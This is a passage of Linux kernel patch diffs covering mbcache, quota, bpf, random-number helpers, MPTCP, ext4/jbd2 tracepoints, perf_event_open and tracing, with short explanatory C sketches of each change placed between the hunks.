+ 	int ret;
+ 
+diff --git a/fs/mbcache.c b/fs/mbcache.c
+index e272ad738faff..2a4b8b549e934 100644
+--- a/fs/mbcache.c
++++ b/fs/mbcache.c
+@@ -100,8 +100,9 @@ int mb_cache_entry_create(struct mb_cache *cache, gfp_t mask, u32 key,
+ 	atomic_set(&entry->e_refcnt, 2);
+ 	entry->e_key = key;
+ 	entry->e_value = value;
+-	entry->e_reusable = reusable;
+-	entry->e_referenced = 0;
++	entry->e_flags = 0;
++	if (reusable)
++		set_bit(MBE_REUSABLE_B, &entry->e_flags);
+ 	head = mb_cache_entry_head(cache, key);
+ 	hlist_bl_lock(head);
+ 	hlist_bl_for_each_entry(dup, dup_node, head, e_hash_list) {
+@@ -165,7 +166,8 @@ static struct mb_cache_entry *__entry_find(struct mb_cache *cache,
+ 	while (node) {
+ 		entry = hlist_bl_entry(node, struct mb_cache_entry,
+ 				       e_hash_list);
+-		if (entry->e_key == key && entry->e_reusable &&
++		if (entry->e_key == key &&
++		    test_bit(MBE_REUSABLE_B, &entry->e_flags) &&
+ 		    atomic_inc_not_zero(&entry->e_refcnt))
+ 			goto out;
+ 		node = node->next;
+@@ -284,7 +286,7 @@ EXPORT_SYMBOL(mb_cache_entry_delete_or_get);
+ void mb_cache_entry_touch(struct mb_cache *cache,
+ 			  struct mb_cache_entry *entry)
+ {
+-	entry->e_referenced = 1;
++	set_bit(MBE_REFERENCED_B, &entry->e_flags);
+ }
+ EXPORT_SYMBOL(mb_cache_entry_touch);
+ 
+@@ -309,9 +311,9 @@ static unsigned long mb_cache_shrink(struct mb_cache *cache,
+ 		entry = list_first_entry(&cache->c_list,
+ 					 struct mb_cache_entry, e_list);
+ 		/* Drop initial hash reference if there is no user */
+-		if (entry->e_referenced ||
++		if (test_bit(MBE_REFERENCED_B, &entry->e_flags) ||
+ 		    atomic_cmpxchg(&entry->e_refcnt, 1, 0) != 1) {
+-			entry->e_referenced = 0;
++			clear_bit(MBE_REFERENCED_B, &entry->e_flags);
+ 			list_move_tail(&entry->e_list, &cache->c_list);
+ 			continue;
+ 		}
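
The mbcache conversion replaces two adjacent one-bit bitfields with a flags
word driven by set_bit()/clear_bit()/test_bit(), because bitfields sharing a
word cannot be updated concurrently without one writer losing the other's
update. The same pattern in userspace C using GCC atomic builtins; the
helper names are illustrative:

    #include <stdbool.h>

    enum { REFERENCED_B = 0, REUSABLE_B = 1 };

    static inline void flag_set(unsigned long *flags, int bit)
    {
            __atomic_fetch_or(flags, 1UL << bit, __ATOMIC_RELAXED);
    }

    static inline void flag_clear(unsigned long *flags, int bit)
    {
            __atomic_fetch_and(flags, ~(1UL << bit), __ATOMIC_RELAXED);
    }

    static inline bool flag_test(const unsigned long *flags, int bit)
    {
            return __atomic_load_n(flags, __ATOMIC_RELAXED) & (1UL << bit);
    }
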
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index 0427b44bfee54..f27faf5db5544 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -2324,6 +2324,8 @@ static int vfs_setup_quota_inode(struct inode *inode, int type)
+ 	struct super_block *sb = inode->i_sb;
+ 	struct quota_info *dqopt = sb_dqopt(sb);
+ 
++	if (is_bad_inode(inode))
++		return -EUCLEAN;
+ 	if (!S_ISREG(inode->i_mode))
+ 		return -EACCES;
+ 	if (IS_RDONLY(inode))
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 9e1e6965f4074..0eb8f035b3d9f 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -642,7 +642,7 @@ static inline u32 type_flag(u32 type)
+ }
+ 
+ /* only use after check_attach_btf_id() */
+-static inline enum bpf_prog_type resolve_prog_type(struct bpf_prog *prog)
++static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ {
+ 	return prog->type == BPF_PROG_TYPE_EXT ?
+ 		prog->aux->dst_prog->type : prog->type;
+diff --git a/include/linux/devfreq.h b/include/linux/devfreq.h
+index 34aab4dd336c8..4dc7cda4fd469 100644
+--- a/include/linux/devfreq.h
++++ b/include/linux/devfreq.h
+@@ -152,8 +152,8 @@ struct devfreq_stats {
+  * @max_state:		count of entry present in the frequency table.
+  * @previous_freq:	previously configured frequency value.
+  * @last_status:	devfreq user device info, performance statistics
+- * @data:	Private data of the governor. The devfreq framework does not
+- *		touch this.
++ * @data:	passed from the devfreq driver to governors; must not be changed by them.
++ * @governor_data:	private data for governors; the devfreq core does not touch it.
+  * @user_min_freq_req:	PM QoS minimum frequency request from user (via sysfs)
+  * @user_max_freq_req:	PM QoS maximum frequency request from user (via sysfs)
+  * @scaling_min_freq:	Limit minimum frequency requested by OPP interface
+@@ -193,7 +193,8 @@ struct devfreq {
+ 	unsigned long previous_freq;
+ 	struct devfreq_dev_status last_status;
+ 
+-	void *data; /* private data for governors */
++	void *data;
++	void *governor_data;
+ 
+ 	struct dev_pm_qos_request user_min_freq_req;
+ 	struct dev_pm_qos_request user_max_freq_req;
+diff --git a/include/linux/fs_parser.h b/include/linux/fs_parser.h
+index f103c91139d4a..01542c4b87a2b 100644
+--- a/include/linux/fs_parser.h
++++ b/include/linux/fs_parser.h
+@@ -76,6 +76,7 @@ static inline int fs_parse(struct fs_context *fc,
+ extern int fs_lookup_param(struct fs_context *fc,
+ 			   struct fs_parameter *param,
+ 			   bool want_bdev,
++			   unsigned int flags,
+ 			   struct path *_path);
+ 
+ extern int lookup_constant(const struct constant_table tbl[], const char *name, int not_found);
+diff --git a/include/linux/mbcache.h b/include/linux/mbcache.h
+index 2da63fd7b98f4..97e64184767de 100644
+--- a/include/linux/mbcache.h
++++ b/include/linux/mbcache.h
+@@ -10,6 +10,12 @@
+ 
+ struct mb_cache;
+ 
++/* Cache entry flags */
++enum {
++	MBE_REFERENCED_B = 0,
++	MBE_REUSABLE_B
++};
++
+ struct mb_cache_entry {
+ 	/* List of entries in cache - protected by cache->c_list_lock */
+ 	struct list_head	e_list;
+@@ -26,8 +32,7 @@ struct mb_cache_entry {
+ 	atomic_t		e_refcnt;
+ 	/* Key in hash - stable during lifetime of the entry */
+ 	u32			e_key;
+-	u32			e_referenced:1;
+-	u32			e_reusable:1;
++	unsigned long		e_flags;
+ 	/* User provided value - stable during lifetime of the entry */
+ 	u64			e_value;
+ };
+diff --git a/include/linux/prandom.h b/include/linux/prandom.h
+index e0a0759dd09c0..1f4a0de7b019e 100644
+--- a/include/linux/prandom.h
++++ b/include/linux/prandom.h
+@@ -23,24 +23,10 @@ void prandom_seed_full_state(struct rnd_state __percpu *pcpu_state);
+ #define prandom_init_once(pcpu_state)			\
+ 	DO_ONCE(prandom_seed_full_state, (pcpu_state))
+ 
+-/**
+- * prandom_u32_max - returns a pseudo-random number in interval [0, ep_ro)
+- * @ep_ro: right open interval endpoint
+- *
+- * Returns a pseudo-random number that is in interval [0, ep_ro). This is
+- * useful when requesting a random index of an array containing ep_ro elements,
+- * for example. The result is somewhat biased when ep_ro is not a power of 2,
+- * so do not use this for cryptographic purposes.
+- *
+- * Returns: pseudo-random number in interval [0, ep_ro)
+- */
++/* Deprecated: use get_random_u32_below() instead. */
+ static inline u32 prandom_u32_max(u32 ep_ro)
+ {
+-	if (__builtin_constant_p(ep_ro <= 1U << 8) && ep_ro <= 1U << 8)
+-		return (get_random_u8() * ep_ro) >> 8;
+-	if (__builtin_constant_p(ep_ro <= 1U << 16) && ep_ro <= 1U << 16)
+-		return (get_random_u16() * ep_ro) >> 16;
+-	return ((u64)get_random_u32() * ep_ro) >> 32;
++	return get_random_u32_below(ep_ro);
+ }
+ 
+ /*
+diff --git a/include/linux/random.h b/include/linux/random.h
+index 147a5e0d0b8ed..bd954ecbef901 100644
+--- a/include/linux/random.h
++++ b/include/linux/random.h
+@@ -51,6 +51,71 @@ static inline unsigned long get_random_long(void)
+ #endif
+ }
+ 
++u32 __get_random_u32_below(u32 ceil);
++
++/*
++ * Returns a random integer in the interval [0, ceil), with uniform
++ * distribution, suitable for all uses. Fastest when ceil is a constant, but
++ * still fast for variable ceil as well.
++ */
++static inline u32 get_random_u32_below(u32 ceil)
++{
++	if (!__builtin_constant_p(ceil))
++		return __get_random_u32_below(ceil);
++
++	/*
++	 * For the fast path, below, all operations on ceil are precomputed by
++	 * the compiler, so this incurs no overhead for checking pow2, doing
++	 * divisions, or branching based on integer size. The resultant
++	 * algorithm does traditional reciprocal multiplication (typically
++	 * optimized by the compiler into shifts and adds), rejecting samples
++	 * whose lower half would indicate a range indivisible by ceil.
++	 */
++	BUILD_BUG_ON_MSG(!ceil, "get_random_u32_below() must take ceil > 0");
++	if (ceil <= 1)
++		return 0;
++	for (;;) {
++		if (ceil <= 1U << 8) {
++			u32 mult = ceil * get_random_u8();
++			if (likely(is_power_of_2(ceil) || (u8)mult >= (1U << 8) % ceil))
++				return mult >> 8;
++		} else if (ceil <= 1U << 16) {
++			u32 mult = ceil * get_random_u16();
++			if (likely(is_power_of_2(ceil) || (u16)mult >= (1U << 16) % ceil))
++				return mult >> 16;
++		} else {
++			u64 mult = (u64)ceil * get_random_u32();
++			if (likely(is_power_of_2(ceil) || (u32)mult >= -ceil % ceil))
++				return mult >> 32;
++		}
++	}
++}
++
++/*
++ * Returns a random integer in the interval (floor, U32_MAX], with uniform
++ * distribution, suitable for all uses. Fastest when floor is a constant, but
++ * still fast for variable floor as well.
++ */
++static inline u32 get_random_u32_above(u32 floor)
++{
++	BUILD_BUG_ON_MSG(__builtin_constant_p(floor) && floor == U32_MAX,
++			 "get_random_u32_above() must take floor < U32_MAX");
++	return floor + 1 + get_random_u32_below(U32_MAX - floor);
++}
++
++/*
++ * Returns a random integer in the interval [floor, ceil], with uniform
++ * distribution, suitable for all uses. Fastest when floor and ceil are
++ * constant, but still fast for variable floor and ceil as well.
++ */
++static inline u32 get_random_u32_inclusive(u32 floor, u32 ceil)
++{
++	BUILD_BUG_ON_MSG(__builtin_constant_p(floor) && __builtin_constant_p(ceil) &&
++			 (floor > ceil || ceil - floor == U32_MAX),
++			 "get_random_u32_inclusive() must take floor <= ceil");
++	return floor + get_random_u32_below(ceil - floor + 1);
++}
++
+ /*
+  * On 64-bit architectures, protect against non-terminated C string overflows
+  * by zeroing out the first byte of the canary; this leaves 56 bits of entropy.
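
The core of get_random_u32_below() is multiply-and-reject sampling: take the
high word of ceil * random32, and retry whenever the low word lands in the
remainder region that would bias the result. A standalone sketch of the
variable-ceil path — rand32() is a toy stand-in for get_random_u32(), not a
quality generator:

    #include <stdint.h>
    #include <stdlib.h>

    static uint32_t rand32(void)
    {
            /* demo only: rand() is not a real entropy source */
            return ((uint32_t)rand() << 16) ^ (uint32_t)rand();
    }

    static uint32_t random_below(uint32_t ceil)
    {
            if (ceil <= 1)
                    return 0;
            for (;;) {
                    uint64_t mult = (uint64_t)ceil * rand32();

                    /* (uint32_t)-ceil % ceil == (2^32 - ceil) % ceil,
                     * i.e. the size of the biased low region */
                    if ((uint32_t)mult >= (uint32_t)(-ceil) % ceil)
                            return (uint32_t)(mult >> 32);
            }
    }
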
+diff --git a/include/net/mptcp.h b/include/net/mptcp.h
+index 412479ebf5ad3..3c5c68618fcc5 100644
+--- a/include/net/mptcp.h
++++ b/include/net/mptcp.h
+@@ -97,8 +97,6 @@ struct mptcp_out_options {
+ };
+ 
+ #ifdef CONFIG_MPTCP
+-extern struct request_sock_ops mptcp_subflow_request_sock_ops;
+-
+ void mptcp_init(void);
+ 
+ static inline bool sk_is_mptcp(const struct sock *sk)
+@@ -188,6 +186,9 @@ void mptcp_seq_show(struct seq_file *seq);
+ int mptcp_subflow_init_cookie_req(struct request_sock *req,
+ 				  const struct sock *sk_listener,
+ 				  struct sk_buff *skb);
++struct request_sock *mptcp_subflow_reqsk_alloc(const struct request_sock_ops *ops,
++					       struct sock *sk_listener,
++					       bool attach_listener);
+ 
+ __be32 mptcp_get_reset_option(const struct sk_buff *skb);
+ 
+@@ -274,6 +275,13 @@ static inline int mptcp_subflow_init_cookie_req(struct request_sock *req,
+ 	return 0; /* TCP fallback */
+ }
+ 
++static inline struct request_sock *mptcp_subflow_reqsk_alloc(const struct request_sock_ops *ops,
++							     struct sock *sk_listener,
++							     bool attach_listener)
++{
++	return NULL;
++}
++
+ static inline __be32 mptcp_reset_option(const struct sk_buff *skb)  { return htonl(0u); }
+ #endif /* CONFIG_MPTCP */
+ 
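
The new mptcp_subflow_reqsk_alloc() stub follows the standard compiled-out
feature pattern: when the option is off, the header supplies a static inline
with the same signature returning NULL, so callers need no #ifdefs of their
own. In miniature, with CONFIG_FEATURE and feature_alloc() as hypothetical
names:

    struct thing;

    #ifdef CONFIG_FEATURE
    struct thing *feature_alloc(int flags);        /* real implementation */
    #else
    static inline struct thing *feature_alloc(int flags)
    {
            return NULL;    /* feature compiled out; caller falls back */
    }
    #endif
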
+diff --git a/include/trace/events/ext4.h b/include/trace/events/ext4.h
+index 229e8fae66a34..ced95fec3367d 100644
+--- a/include/trace/events/ext4.h
++++ b/include/trace/events/ext4.h
+@@ -104,6 +104,7 @@ TRACE_DEFINE_ENUM(EXT4_FC_REASON_RESIZE);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_RENAME_DIR);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_FALLOC_RANGE);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_INODE_JOURNAL_DATA);
++TRACE_DEFINE_ENUM(EXT4_FC_REASON_ENCRYPTED_FILENAME);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_MAX);
+ 
+ #define show_fc_reason(reason)						\
+@@ -116,7 +117,8 @@ TRACE_DEFINE_ENUM(EXT4_FC_REASON_MAX);
+ 		{ EXT4_FC_REASON_RESIZE,	"RESIZE"},		\
+ 		{ EXT4_FC_REASON_RENAME_DIR,	"RENAME_DIR"},		\
+ 		{ EXT4_FC_REASON_FALLOC_RANGE,	"FALLOC_RANGE"},	\
+-		{ EXT4_FC_REASON_INODE_JOURNAL_DATA,	"INODE_JOURNAL_DATA"})
++		{ EXT4_FC_REASON_INODE_JOURNAL_DATA,	"INODE_JOURNAL_DATA"}, \
++		{ EXT4_FC_REASON_ENCRYPTED_FILENAME,	"ENCRYPTED_FILENAME"})
+ 
+ TRACE_EVENT(ext4_other_inode_update_time,
+ 	TP_PROTO(struct inode *inode, ino_t orig_ino),
+@@ -2764,7 +2766,7 @@ TRACE_EVENT(ext4_fc_stats,
+ 	),
+ 
+ 	TP_printk("dev %d,%d fc ineligible reasons:\n"
+-		  "%s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u "
++		  "%s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u"
+ 		  "num_commits:%lu, ineligible: %lu, numblks: %lu",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_XATTR),
+@@ -2776,6 +2778,7 @@ TRACE_EVENT(ext4_fc_stats,
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_RENAME_DIR),
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_FALLOC_RANGE),
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_INODE_JOURNAL_DATA),
++		  FC_REASON_NAME_STAT(EXT4_FC_REASON_ENCRYPTED_FILENAME),
+ 		  __entry->fc_commits, __entry->fc_ineligible_commits,
+ 		  __entry->fc_numblks)
+ );
+diff --git a/include/trace/events/jbd2.h b/include/trace/events/jbd2.h
+index 99f783c384bb4..8f5ee380d3093 100644
+--- a/include/trace/events/jbd2.h
++++ b/include/trace/events/jbd2.h
+@@ -40,7 +40,7 @@ DECLARE_EVENT_CLASS(jbd2_commit,
+ 	TP_STRUCT__entry(
+ 		__field(	dev_t,	dev			)
+ 		__field(	char,	sync_commit		  )
+-		__field(	int,	transaction		  )
++		__field(	tid_t,	transaction		  )
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -49,7 +49,7 @@ DECLARE_EVENT_CLASS(jbd2_commit,
+ 		__entry->transaction	= commit_transaction->t_tid;
+ 	),
+ 
+-	TP_printk("dev %d,%d transaction %d sync %d",
++	TP_printk("dev %d,%d transaction %u sync %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  __entry->transaction, __entry->sync_commit)
+ );
+@@ -97,8 +97,8 @@ TRACE_EVENT(jbd2_end_commit,
+ 	TP_STRUCT__entry(
+ 		__field(	dev_t,	dev			)
+ 		__field(	char,	sync_commit		  )
+-		__field(	int,	transaction		  )
+-		__field(	int,	head		  	  )
++		__field(	tid_t,	transaction		  )
++		__field(	tid_t,	head		  	  )
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -108,7 +108,7 @@ TRACE_EVENT(jbd2_end_commit,
+ 		__entry->head		= journal->j_tail_sequence;
+ 	),
+ 
+-	TP_printk("dev %d,%d transaction %d sync %d head %d",
++	TP_printk("dev %d,%d transaction %u sync %d head %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  __entry->transaction, __entry->sync_commit, __entry->head)
+ );
+@@ -134,14 +134,14 @@ TRACE_EVENT(jbd2_submit_inode_data,
+ );
+ 
+ DECLARE_EVENT_CLASS(jbd2_handle_start_class,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int requested_blocks),
+ 
+ 	TP_ARGS(dev, tid, type, line_no, requested_blocks),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	 unsigned int,	type		)
+ 		__field(	 unsigned int,	line_no		)
+ 		__field(		  int,	requested_blocks)
+@@ -155,28 +155,28 @@ DECLARE_EVENT_CLASS(jbd2_handle_start_class,
+ 		__entry->requested_blocks = requested_blocks;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu type %u line_no %u "
++	TP_printk("dev %d,%d tid %u type %u line_no %u "
+ 		  "requested_blocks %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  __entry->type, __entry->line_no, __entry->requested_blocks)
+ );
+ 
+ DEFINE_EVENT(jbd2_handle_start_class, jbd2_handle_start,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int requested_blocks),
+ 
+ 	TP_ARGS(dev, tid, type, line_no, requested_blocks)
+ );
+ 
+ DEFINE_EVENT(jbd2_handle_start_class, jbd2_handle_restart,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int requested_blocks),
+ 
+ 	TP_ARGS(dev, tid, type, line_no, requested_blocks)
+ );
+ 
+ TRACE_EVENT(jbd2_handle_extend,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int buffer_credits,
+ 		 int requested_blocks),
+ 
+@@ -184,7 +184,7 @@ TRACE_EVENT(jbd2_handle_extend,
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	 unsigned int,	type		)
+ 		__field(	 unsigned int,	line_no		)
+ 		__field(		  int,	buffer_credits  )
+@@ -200,7 +200,7 @@ TRACE_EVENT(jbd2_handle_extend,
+ 		__entry->requested_blocks = requested_blocks;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu type %u line_no %u "
++	TP_printk("dev %d,%d tid %u type %u line_no %u "
+ 		  "buffer_credits %d requested_blocks %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  __entry->type, __entry->line_no, __entry->buffer_credits,
+@@ -208,7 +208,7 @@ TRACE_EVENT(jbd2_handle_extend,
+ );
+ 
+ TRACE_EVENT(jbd2_handle_stats,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int interval, int sync,
+ 		 int requested_blocks, int dirtied_blocks),
+ 
+@@ -217,7 +217,7 @@ TRACE_EVENT(jbd2_handle_stats,
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	 unsigned int,	type		)
+ 		__field(	 unsigned int,	line_no		)
+ 		__field(		  int,	interval	)
+@@ -237,7 +237,7 @@ TRACE_EVENT(jbd2_handle_stats,
+ 		__entry->dirtied_blocks	  = dirtied_blocks;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu type %u line_no %u interval %d "
++	TP_printk("dev %d,%d tid %u type %u line_no %u interval %d "
+ 		  "sync %d requested_blocks %d dirtied_blocks %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  __entry->type, __entry->line_no, __entry->interval,
+@@ -246,14 +246,14 @@ TRACE_EVENT(jbd2_handle_stats,
+ );
+ 
+ TRACE_EVENT(jbd2_run_stats,
+-	TP_PROTO(dev_t dev, unsigned long tid,
++	TP_PROTO(dev_t dev, tid_t tid,
+ 		 struct transaction_run_stats_s *stats),
+ 
+ 	TP_ARGS(dev, tid, stats),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	unsigned long,	wait		)
+ 		__field(	unsigned long,	request_delay	)
+ 		__field(	unsigned long,	running		)
+@@ -279,7 +279,7 @@ TRACE_EVENT(jbd2_run_stats,
+ 		__entry->blocks_logged	= stats->rs_blocks_logged;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu wait %u request_delay %u running %u "
++	TP_printk("dev %d,%d tid %u wait %u request_delay %u running %u "
+ 		  "locked %u flushing %u logging %u handle_count %u "
+ 		  "blocks %u blocks_logged %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+@@ -294,14 +294,14 @@ TRACE_EVENT(jbd2_run_stats,
+ );
+ 
+ TRACE_EVENT(jbd2_checkpoint_stats,
+-	TP_PROTO(dev_t dev, unsigned long tid,
++	TP_PROTO(dev_t dev, tid_t tid,
+ 		 struct transaction_chp_stats_s *stats),
+ 
+ 	TP_ARGS(dev, tid, stats),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	unsigned long,	chp_time	)
+ 		__field(		__u32,	forced_to_close	)
+ 		__field(		__u32,	written		)
+@@ -317,7 +317,7 @@ TRACE_EVENT(jbd2_checkpoint_stats,
+ 		__entry->dropped	= stats->cs_dropped;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu chp_time %u forced_to_close %u "
++	TP_printk("dev %d,%d tid %u chp_time %u forced_to_close %u "
+ 		  "written %u dropped %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  jiffies_to_msecs(__entry->chp_time),
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 25a54e04560e5..17ab3e15ac25f 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -2088,6 +2088,7 @@ static unsigned int __bpf_prog_ret0_warn(const void *ctx,
+ bool bpf_prog_map_compatible(struct bpf_map *map,
+ 			     const struct bpf_prog *fp)
+ {
++	enum bpf_prog_type prog_type = resolve_prog_type(fp);
+ 	bool ret;
+ 
+ 	if (fp->kprobe_override)
+@@ -2098,12 +2099,12 @@ bool bpf_prog_map_compatible(struct bpf_map *map,
+ 		/* There's no owner yet where we could check for
+ 		 * compatibility.
+ 		 */
+-		map->owner.type  = fp->type;
++		map->owner.type  = prog_type;
+ 		map->owner.jited = fp->jited;
+ 		map->owner.xdp_has_frags = fp->aux->xdp_has_frags;
+ 		ret = true;
+ 	} else {
+-		ret = map->owner.type  == fp->type &&
++		ret = map->owner.type  == prog_type &&
+ 		      map->owner.jited == fp->jited &&
+ 		      map->owner.xdp_has_frags == fp->aux->xdp_has_frags;
+ 	}
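
The bpf fix matters because an EXT program takes on the type of the program
it extends, so the map-owner comparison must use the resolved type rather
than the literal one. A reduced sketch — the enum, struct and function names
mirror the kernel's shape but are illustrative:

    #include <stdbool.h>

    enum prog_type { PROG_TYPE_XDP, PROG_TYPE_EXT };

    struct prog {
            enum prog_type type;
            const struct prog *dst_prog;   /* target of an EXT program */
    };

    static enum prog_type resolve_type(const struct prog *p)
    {
            return p->type == PROG_TYPE_EXT ? p->dst_prog->type : p->type;
    }

    static bool owner_compatible(enum prog_type owner, const struct prog *p)
    {
            /* compare against what the program *behaves as*, not what
             * it is literally tagged as */
            return owner == resolve_type(p);
    }
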
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 732b392fc5c63..3b9e86108f435 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -12231,12 +12231,12 @@ SYSCALL_DEFINE5(perf_event_open,
+ 	if (flags & ~PERF_FLAG_ALL)
+ 		return -EINVAL;
+ 
+-	/* Do we allow access to perf_event_open(2) ? */
+-	err = security_perf_event_open(&attr, PERF_SECURITY_OPEN);
++	err = perf_copy_attr(attr_uptr, &attr);
+ 	if (err)
+ 		return err;
+ 
+-	err = perf_copy_attr(attr_uptr, &attr);
++	/* Do we allow access to perf_event_open(2) ? */
++	err = security_perf_event_open(&attr, PERF_SECURITY_OPEN);
+ 	if (err)
+ 		return err;
+ 
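
The perf_event_open() change is an ordering fix: the LSM hook was consulted
before the attribute struct had been copied in from userspace, so it judged
uninitialized data. The general shape — copy first, authorize the real data
second — in a reduced sketch with stand-in types and hook names:

    #include <errno.h>
    #include <string.h>

    struct attr { int type; int config; };

    /* illustrative stand-ins for perf_copy_attr() and the LSM hook */
    static int copy_attr(struct attr *dst, const struct attr *usrc)
    {
            memcpy(dst, usrc, sizeof(*dst));
            return 0;
    }

    static int security_check(const struct attr *a)
    {
            return a->type >= 0 ? 0 : -EACCES;
    }

    static int open_event(const struct attr *uattr)
    {
            struct attr attr;
            int err;

            err = copy_attr(&attr, uattr);  /* fill attr first... */
            if (err)
                    return err;
            return security_check(&attr);   /* ...then judge real data */
    }
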
+diff --git a/kernel/trace/Kconfig b/kernel/trace/Kconfig
+index e9e95c790b8ee..93d7249962833 100644
+--- a/kernel/trace/Kconfig
++++ b/kernel/trace/Kconfig
+@@ -375,6 +375,7 @@ config SCHED_TRACER
+ config HWLAT_TRACER
+ 	bool "Tracer to detect hardware latencies (like SMIs)"
+ 	select GENERIC_TRACER
++	select TRACER_MAX_TRACE
+ 	help
+ 	 This tracer, when enabled will create one or more kernel threads,
+ 	 depending on what the cpumask file is set to, which each thread
+@@ -410,6 +411,7 @@ config HWLAT_TRACER
+ config OSNOISE_TRACER
+ 	bool "OS Noise tracer"
+ 	select GENERIC_TRACER
++	select TRACER_MAX_TRACE
+ 	help
+ 	  In the context of high-performance computing (HPC), the Operating
+ 	  System Noise (osnoise) refers to the interference experienced by an
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 5cfc95a52bc37..3076af8dbf32e 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1421,6 +1421,7 @@ int tracing_snapshot_cond_disable(struct trace_array *tr)
+ 	return false;
+ }
+ EXPORT_SYMBOL_GPL(tracing_snapshot_cond_disable);
++#define free_snapshot(tr)	do { } while (0)
+ #endif /* CONFIG_TRACER_SNAPSHOT */
+ 
+ void tracer_tracing_off(struct trace_array *tr)
+@@ -1692,6 +1693,8 @@ static ssize_t trace_seq_to_buffer(struct trace_seq *s, void *buf, size_t cnt)
+ }
+ 
+ unsigned long __read_mostly	tracing_thresh;
++
++#ifdef CONFIG_TRACER_MAX_TRACE
+ static const struct file_operations tracing_max_lat_fops;
+ 
+ #ifdef LATENCY_FS_NOTIFY
+@@ -1748,18 +1751,14 @@ void latency_fsnotify(struct trace_array *tr)
+ 	irq_work_queue(&tr->fsnotify_irqwork);
+ }
+ 
+-#elif defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER)	\
+-	|| defined(CONFIG_OSNOISE_TRACER)
++#else /* !LATENCY_FS_NOTIFY */
+ 
+ #define trace_create_maxlat_file(tr, d_tracer)				\
+ 	trace_create_file("tracing_max_latency", TRACE_MODE_WRITE,	\
+ 			  d_tracer, &tr->max_latency, &tracing_max_lat_fops)
+ 
+-#else
+-#define trace_create_maxlat_file(tr, d_tracer)	 do { } while (0)
+ #endif
+ 
+-#ifdef CONFIG_TRACER_MAX_TRACE
+ /*
+  * Copy the new maximum trace into the separate maximum-trace
+  * structure. (this way the maximum trace is permanently saved,
+@@ -1834,14 +1833,15 @@ update_max_tr(struct trace_array *tr, struct task_struct *tsk, int cpu,
+ 		ring_buffer_record_off(tr->max_buffer.buffer);
+ 
+ #ifdef CONFIG_TRACER_SNAPSHOT
+-	if (tr->cond_snapshot && !tr->cond_snapshot->update(tr, cond_data))
+-		goto out_unlock;
++	if (tr->cond_snapshot && !tr->cond_snapshot->update(tr, cond_data)) {
++		arch_spin_unlock(&tr->max_lock);
++		return;
++	}
+ #endif
+ 	swap(tr->array_buffer.buffer, tr->max_buffer.buffer);
+ 
+ 	__update_max_tr(tr, tsk, cpu);
+ 
+- out_unlock:
+ 	arch_spin_unlock(&tr->max_lock);
+ }
+ 
